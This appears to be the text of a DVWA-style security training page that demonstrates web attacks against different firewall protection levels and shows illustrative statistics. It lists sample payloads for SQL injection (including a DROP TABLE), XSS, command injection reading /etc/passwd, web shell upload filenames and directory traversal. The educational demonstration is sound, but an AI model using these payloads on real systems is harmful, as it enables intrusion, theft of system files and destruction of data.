🛡️ Cloudflare: ACTIVE

Attack & Defense Essential

Damn Vulnerable Web Application Style - Layer 7 Attack Demonstration

⚠️ DVWA DEMO MODE ⚠️

🔒 Security Level Configuration

Choose your protection level to see how different configurations handle attacks

🟢 Low (No Protection)
🟡 Medium (Basic WAF)
🔴 High (Advanced WAF)
🛡️ Cloudflare (Full Protection)

📊 Real-time Attack Statistics

247
Attacks Blocked
3
Successful Attacks
1,352
Total Attempts
85
Threat Score
💉 SQL Injection HIGH RISK

💡 Try these payloads:

1' OR '1'='1
1; DROP TABLE users;--
1' UNION SELECT password FROM admin--
Ready to test SQL injection...
🚨 Cross-Site Scripting (XSS) HIGH RISK

💡 Try these payloads:

<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
Ready to test XSS...
⚡ Command Injection HIGH RISK

💡 Try these payloads:

127.0.0.1; cat /etc/passwd
127.0.0.1 && whoami
127.0.0.1 | ls -la
Ready to test command injection...
📁 File Upload Vulnerability MEDIUM RISK

💡 Try these filenames:

shell.php
backdoor.asp
../../../etc/passwd
Ready to test file upload...
🔄 Cross-Site Request Forgery MEDIUM RISK

💡 CSRF Attack Scenarios:

Hidden form auto-submit
Malicious image src attribute
AJAX request from malicious site
Ready to test CSRF...
📂 Directory Traversal MEDIUM RISK

💡 Try these paths:

../../../etc/passwd
..\\..\\..\\windows\\system32\\drivers\\etc\\hosts
....//....//....//etc//passwd
Ready to test directory traversal...